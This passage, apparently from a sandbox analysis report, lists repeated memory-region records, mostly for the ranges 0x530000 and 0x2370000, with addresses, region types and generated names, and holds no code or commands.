0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11395 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11396 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11397 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11398 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11399 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11400 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11401 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11402 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11403 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11404 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11405 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11406 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11407 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11408 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11409 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11410 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11411 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11412 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11413 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11414 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11415 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11416 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11417 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11418 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11419 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11420 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11421 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11422 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11423 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11424 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11425 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11426 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11427 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11428 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11429 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11430 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11431 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11432 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11433 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11434 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11435 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11436 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11437 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11438 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11439 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11440 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11441 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11442 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11443 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11444 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11445 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11446 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11447 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11448 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11449 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11450 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11451 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11452 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11453 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11454 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11455 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11456 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11457 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11458 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11459 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11460 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11461 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11462 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11463 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11464 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11465 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11466 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11467 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11468 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11469 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11470 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11471 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11472 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11473 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11474 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11475 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11476 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11477 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11478 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11479 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11480 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11481 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11482 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11483 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11484 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11485 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11486 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11487 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11488 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11489 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11490 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11491 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11492 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11493 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11494 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11495 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11496 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11497 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11498 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11499 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11500 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11501 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11503 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11504 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11505 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11506 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11507 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11508 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11509 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11510 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11511 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11512 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11513 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11514 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11515 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11516 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11517 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11518 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11519 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11520 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11521 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11522 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11523 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11524 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11525 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11526 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11527 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11528 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11529 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11530 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11531 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11532 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11533 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11534 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11535 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11536 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11537 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11538 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11539 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11540 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11541 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11542 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11543 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11544 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11545 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11546 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11547 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11548 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11549 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11550 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11551 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11552 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11553 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11554 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11555 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11556 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11557 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11558 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11559 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11560 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11561 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11562 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11563 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11564 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11565 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11566 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11567 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11568 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11569 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11570 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11571 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11572 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11573 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11575 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11576 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11577 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11580 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11581 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11582 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11583 start_va = 0x530000 end_va = 0x53dfff 